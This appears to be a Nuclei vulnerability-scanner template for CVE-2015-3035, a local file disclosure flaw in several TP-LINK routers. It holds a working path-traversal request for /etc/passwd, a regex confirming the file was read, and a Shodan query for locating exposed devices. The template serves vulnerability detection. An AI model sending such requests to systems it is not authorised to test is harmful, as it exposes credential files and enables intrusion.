nuclei-templates/cves/2015/CVE-2015-3035.yaml

35 lines
1.0 KiB
YAML

id: CVE-2015-3035
info:
name: Multiple TP-LINK Products Vulnerable - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
reference:
- https://seclists.org/fulldisclosure/2015/Apr/26
- https://nvd.nist.gov/vuln/detail/CVE-2015-3035
- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt
- http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware
classification:
cve-id: CVE-2015-3035
metadata:
shodan-query: http.title:"TP-LINK"
verified: "true"
tags: router,lfi,seclists,cve,cve2015,tplink,kev
requests:
- method: GET
path:
- "{{BaseURL}}/login/../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200